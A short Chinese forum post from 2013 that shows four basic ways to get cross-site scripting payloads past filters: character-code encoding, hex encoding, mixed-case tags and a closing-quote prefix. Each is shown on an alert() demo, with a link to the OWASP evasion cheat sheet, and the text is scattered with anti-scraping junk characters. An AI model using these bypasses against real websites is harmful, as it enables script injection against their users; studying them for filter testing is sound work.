四种超级基础的绕过方法。
& g3 p0 A3 Y9 V9 I- M1.转换为ASCII码9 b. e4 \, q/ z, }5 [
例子:原脚本为<script>alert(‘I love F4ck’)</script >0 ?# R) b6 y* p/ [$ m
通过转换,变成:; ]% | J X, N' d6 W5 W' K
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
: L* e4 [. n9 \" D) A" J
$ S! f4 o$ T* J2.转换为HEX(十六进制)
: n. Z/ i4 x0 d6 s" S) `例子:原脚本为<script>alert(‘I love F4ck’)</script> Q* z" T% z- {, a9 ]
通过转换,变成:
5 N/ S$ N: n* U%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e& h6 p. i* U) F1 J
" y% E$ g# [4 E- g/ [2 E2 q: c3.转换脚本的大小写" d. B: G8 W+ b9 r" F
例子:原脚本为<script>alert(‘I love F4ck’)</script>
! L, g# m X) A' i7 T9 h转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
$ e2 ?3 f- U4 C5 o/ k
. o- y4 R& C+ {2 ?1 \/ X8 c4.增加闭合标记”>
6 ?) K( i/ g: U( M例子:原脚本为<script>alert(‘I love F4ck’)</script>/ ]6 g( V$ T1 Z
转换为:”><script>alert(‘I love F4ck’)</script>
2 O2 c$ g4 O. \6 A4 n& ?4 F更详细绕过技术请参考此网页+ ]6 n6 k9 z( T
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet8 o0 v2 p1 k V8 A) J9 A* _0 y+ Y5 g
/ s M" z" C8 f9 G3 g( R转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对